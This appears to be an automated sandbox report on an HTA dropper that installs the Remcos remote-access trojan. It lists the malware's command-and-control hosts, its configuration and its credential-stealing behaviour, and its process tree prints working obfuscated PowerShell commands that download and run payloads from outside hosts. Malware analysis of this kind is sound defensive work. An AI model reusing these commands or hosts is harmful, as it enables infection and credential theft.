Analysis

  • max time kernel
    899s
  • max time network
    880s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-01-2025 04:48

General

  • Target

    http://107.172.148.212/xampp/kkn/nsoo/nomralwaygivenmebestthingswithentireilifegoses.hta

Malware Config

Extracted

Family

remcos

Botnet

zyn29

C2

nicekboupdatedgood.duckdns.org:14646

nicekboupdatedgood.duckdns.org:1070

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-TMUT0V

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 3 IoCs
  • Evasion via Device Credential Deployment 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious use of SetThreadContext 4 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://107.172.148.212/xampp/kkn/nsoo/nomralwaygivenmebestthingswithentireilifegoses.hta
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3000
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe0151cc40,0x7ffe0151cc4c,0x7ffe0151cc58
      2⤵
        PID:3132
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1968,i,13644813035542765892,7605110531875097087,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1664 /prefetch:2
        2⤵
          PID:1556
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2120,i,13644813035542765892,7605110531875097087,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2148 /prefetch:3
          2⤵
            PID:3436
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2200,i,13644813035542765892,7605110531875097087,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2340 /prefetch:8
            2⤵
              PID:4884
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3044,i,13644813035542765892,7605110531875097087,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3060 /prefetch:1
              2⤵
                PID:3228
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3064,i,13644813035542765892,7605110531875097087,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3108 /prefetch:1
                2⤵
                  PID:4908
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4828,i,13644813035542765892,7605110531875097087,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4944 /prefetch:8
                  2⤵
                    PID:3456
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4976,i,13644813035542765892,7605110531875097087,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5236 /prefetch:8
                    2⤵
                      PID:2364
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5128,i,13644813035542765892,7605110531875097087,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=964 /prefetch:8
                      2⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:460
                  • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                    1⤵
                      PID:420
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                      1⤵
                        PID:2224
                      • C:\Windows\System32\rundll32.exe
                        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                        1⤵
                          PID:4440
                        • C:\Windows\SysWOW64\mshta.exe
                          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloads\nomralwaygivenmebestthingswithentireilifegoses.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                          1⤵
                          • Checks computer location settings
                          • System Location Discovery: System Language Discovery
                          PID:2256
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" "/C PoWeRsHell -eX bYPass -nop -W 1 -C DevIceCREdeNTIAlDePloYmenT ; INvOKe-exPrESSioN($(invOKE-exPreSSioN('[SystEM.TexT.ENCoDing]'+[CHaR]58+[ChAR]0X3A+'utf8.GeTSTRing([SySTem.CONVert]'+[ChAR]0x3A+[chAR]58+'FroMbasE64strINg('+[cHaR]34+'JHhScmNEMzlnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlckRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbU9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhIZmpRS3BNYVQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3FGZXhobGlJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJwVll4UmtIZCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbmtCT3Bjdmd4cUUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWWVCSU8pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2aFlHTFoiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRxeEggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHhScmNEMzlnOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi4xNDguMjEyL3hhbXBwL2trbi9ub3JtYWx3YXl0b2dpdmViZXN0aGluZ3N3aGljaGdpdmVuYmVzdC5nSUYiLCIkZU5WOkFQUERBVEFcbm9tcmFsd2F5Z2l2ZW5tZWJlc3R0aGluZ3N3aXRoZW50aXJlaWxpZmVnb28udmJzIiwwLDApO3N0YVJ0LVNMZWVwKDMpO0luVm9rZS1FWFByRXNTaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxub21yYWx3YXlnaXZlbm1lYmVzdHRoaW5nc3dpdGhlbnRpcmVpbGlmZWdvby52YnMi'+[chaR]0X22+'))')))"
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:3680
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              PoWeRsHell -eX bYPass -nop -W 1 -C DevIceCREdeNTIAlDePloYmenT ; INvOKe-exPrESSioN($(invOKE-exPreSSioN('[SystEM.TexT.ENCoDing]'+[CHaR]58+[ChAR]0X3A+'utf8.GeTSTRing([SySTem.CONVert]'+[ChAR]0x3A+[chAR]58+'FroMbasE64strINg('+[cHaR]34+'JHhScmNEMzlnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlckRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbU9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhIZmpRS3BNYVQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3FGZXhobGlJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJwVll4UmtIZCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbmtCT3Bjdmd4cUUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWWVCSU8pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2aFlHTFoiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRxeEggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHhScmNEMzlnOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi4xNDguMjEyL3hhbXBwL2trbi9ub3JtYWx3YXl0b2dpdmViZXN0aGluZ3N3aGljaGdpdmVuYmVzdC5nSUYiLCIkZU5WOkFQUERBVEFcbm9tcmFsd2F5Z2l2ZW5tZWJlc3R0aGluZ3N3aXRoZW50aXJlaWxpZmVnb28udmJzIiwwLDApO3N0YVJ0LVNMZWVwKDMpO0luVm9rZS1FWFByRXNTaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxub21yYWx3YXlnaXZlbm1lYmVzdHRoaW5nc3dpdGhlbnRpcmVpbGlmZWdvby52YnMi'+[chaR]0X22+'))')))"
                              3⤵
                              • Blocklisted process makes network request
                              • Evasion via Device Credential Deployment
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              PID:392
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kmn14ctk\kmn14ctk.cmdline"
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:408
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6898.tmp" "c:\Users\Admin\AppData\Local\Temp\kmn14ctk\CSCD3DD3F53FEAD4873BFADC8FE618A022.TMP"
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2084
                              • C:\Windows\SysWOW64\WScript.exe
                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nomralwaygivenmebestthingswithentireilifegoo.vbs"
                                4⤵
                                • Checks computer location settings
                                • System Location Discovery: System Language Discovery
                                PID:1840
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AbgBvAG8AcwBkAGUAbgBlAHAAcABhAGgAcwBnAG4AaQBoAHQAZABvAG8AZwAvAG4AawBrAC8AcABwAG0AYQB4AC8AMgAxADIALgA4ADQAMQAuADIANwAxAC4ANwAwADEALwAvADoAcAB0AHQAaAAnADsAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAgAD0AIAAkAG8AcgBpAGcAaQBuAGEAbABUAGUAeAB0ACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAGEAeAB3AHUAYQA2ADMAeQAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwA3ADYAOQA2ADEANwAxAC8AaABlAGsAZQAyAHAAbQB0AGUAdQB3ADgAcwBxAHMAcABsAGgAawBsAC4AagBwAGcAJwA7ACQAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAD0AIAAkAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGkAbQBhAGcAZQBVAHIAbAApADsAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACQAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGUAbgBkAEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACkAOwAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAJAB0AHkAcABlACAAPQAgAFsAQwBsAGEAcwBzAEwAaQBiAHIAYQByAHkAMQAuAEgAbwBtAGUAXQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBtAGEAaQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAcgBlAHMAdABvAHIAZQBkAFQAZQB4AHQALAAnAGYAYQBsAHMAZQAnACwAJwBDAGEAcwBQAG8AbAAnACwAJwBmAGEAbABzAGUAJwApACkA')) | Invoke-Expression"
                                  5⤵
                                  • Blocklisted process makes network request
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious use of SetThreadContext
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:1372
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                    6⤵
                                    • Suspicious use of SetThreadContext
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: MapViewOfSection
                                    PID:1684
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\sdcpgrnwtntegsipopnsjpgoxbukaop"
                                      7⤵
                                        PID:740
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\sdcpgrnwtntegsipopnsjpgoxbukaop"
                                        7⤵
                                          PID:4520
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\sdcpgrnwtntegsipopnsjpgoxbukaop"
                                          7⤵
                                            PID:2408
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\sdcpgrnwtntegsipopnsjpgoxbukaop"
                                            7⤵
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:3288
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\ufhizkyxpvlrrgwtyaittctxyidttygolp"
                                            7⤵
                                              PID:4396
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\ufhizkyxpvlrrgwtyaittctxyidttygolp"
                                              7⤵
                                              • Accesses Microsoft Outlook accounts
                                              • System Location Discovery: System Language Discovery
                                              PID:4384
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\fzubaci"
                                              7⤵
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:2040

                                Network

                                MITRE ATT&CK Enterprise v15

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\85d76d4d-64d2-407c-80e9-25e51d39ce80.tmp

                                  Filesize

                                  116KB

                                  MD5

                                  c668ecd8d8ba575dcf200d0a70dad391

                                  SHA1

                                  ec556dab8e275b970a132b46e261ab38b1d6680c

                                  SHA256

                                  2c1f25c4e3cb30238ec5f5af77d18bd02a3b12e33de463cd459f961469ceeafa

                                  SHA512

                                  7955b9bca12348d1b519beffb65a9a34c3265d756ca9ae7243929cd83cc1b87dd35e007bb728cce85dc581fb8dbca7c66c8e6cab794e702aa5c578b5d8b36ccd

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                  Filesize

                                  649B

                                  MD5

                                  889947f3901fd835ddc16babb0090c5d

                                  SHA1

                                  ad2ae39449c5953ea206e5a34aad67024ef7be6d

                                  SHA256

                                  bbf3ff183e3d735076b74391767ec7531a08eb315bc6b507349d59ade9b82f80

                                  SHA512

                                  9ff52d29efbe33541cbe557cacbcbb5988562fea30dc3ca5f0537d7d9f3c551b2aef3288df6e3687bfe333d4699434e0eb31e0d1b2510b798c81acdfb63df75f

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                  Filesize

                                  1KB

                                  MD5

                                  b4b2c4b12a3bca84b0f5e23333243733

                                  SHA1

                                  5b1dc3f7f3b9e5dcc14f0830dba96d0a7bc61c82

                                  SHA256

                                  416f6c2f489b21d2fe48e111baa17ed4a786dbe062bf510112570c9f359775ef

                                  SHA512

                                  ffb6c645ea9a89db5bb2c5ed364fb7587fdbf369aa1c7b068fffb4a20d4dc7f8253fc51cca7e481e52d9a3607536fc7294944bf5d7397162617046c1ebe08e80

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                  Filesize

                                  2B

                                  MD5

                                  d751713988987e9331980363e24189ce

                                  SHA1

                                  97d170e1550eee4afc0af065b78cda302a97674c

                                  SHA256

                                  4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                  SHA512

                                  b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                  Filesize

                                  9KB

                                  MD5

                                  2074a498f2241bae172f7c35dfcc4367

                                  SHA1

                                  81204294de3d0d1469537be87f1c0b6cfe97b1a2

                                  SHA256

                                  76e0551570dd2b1e433d1145212de11ece806d37a100254e7f56ec632a4cee62

                                  SHA512

                                  cd394ae5c400fc4d2511e9113159fb457ca2283cd80fa80e9cbff7b4fdf494ead12cf4ef892cd457db1ea644983f5501e3024e47a6da72758abeff6e33167770

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                  Filesize

                                  9KB

                                  MD5

                                  a38e23aa1f09f3703f97b1bb8aeb5097

                                  SHA1

                                  08f893c148360f2487b9a3172efd0c853ee41595

                                  SHA256

                                  7a9dfa8ebf92953a75a51525a908e880e3489652779319869dbb3d2bd2995ada

                                  SHA512

                                  c6a213428f286dc86116aaca9730ed934dbd998f4742d139d0af3b2077e276eceb6f154655408f2c29b5b8eb079d2f91051f0d306fa1571ca34c94523d2aa77e

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                  Filesize

                                  9KB

                                  MD5

                                  8134ce4a3e78c588dd5a93426afd798d

                                  SHA1

                                  928887f98fc5762e4ef4efd3932202f9464d55eb

                                  SHA256

                                  92e0b99cc298db95e3365661add58b53a74a080cf11103383a94e6e2d8603b57

                                  SHA512

                                  231a5b7aa87dcf9fe5549e6ab8252b6396c769a31aaa337a8538d961106bb13c184ef99ea978ffffc121bf3300217e148f39047e6bb70cde4243b1b8d655eadb

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                  Filesize

                                  9KB

                                  MD5

                                  25e411e1791a98eb1b362626e29261e5

                                  SHA1

                                  cf623f1c92814de09570ea591f2bdd370f331662

                                  SHA256

                                  b0914f34e7cbcdd9ad969724e832addee19198d872d124d37fc33d096b40a7ae

                                  SHA512

                                  022c8ac3d9812ced179afc75315c90bdd3df35f61627e43f23cf0dbdf576defa501567e31d57cc09d3fa9d3ae950843aae8acf4576ff98320ab362da310efe1e

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                  Filesize

                                  9KB

                                  MD5

                                  663346cbf59f446969db840795c2f1f5

                                  SHA1

                                  5e3161ef170f435158f3002a60b3d329e127593e

                                  SHA256

                                  3f9c1e5c3f74face5cc510e120ed6807600dd5c889e44102b824ec66a6020406

                                  SHA512

                                  2250e438c7a6fc8326c4583db5e8de385ffcfac701311baa470d26e361e50392b7602d32792cacdca913d81825ae80dc2867652cd0c69edc5d36e58dcd361557

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                  Filesize

                                  9KB

                                  MD5

                                  2141071f121a11db4936a4b351be5df3

                                  SHA1

                                  f394da78a4d0a1a69b5fe445b4b7e5ba71a11c57

                                  SHA256

                                  03324edaf4ad9af93ccaa04a7eea921432dd5b7b91b76d257147e8f6de4c9355

                                  SHA512

                                  e8737aaa193331549eaa34c8ad1960492e374fee34494249e41290347b3b2137c116d19319e7a209747217a86fb8eeb10bf6567d67680a80a10b6b47176fa6f1

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

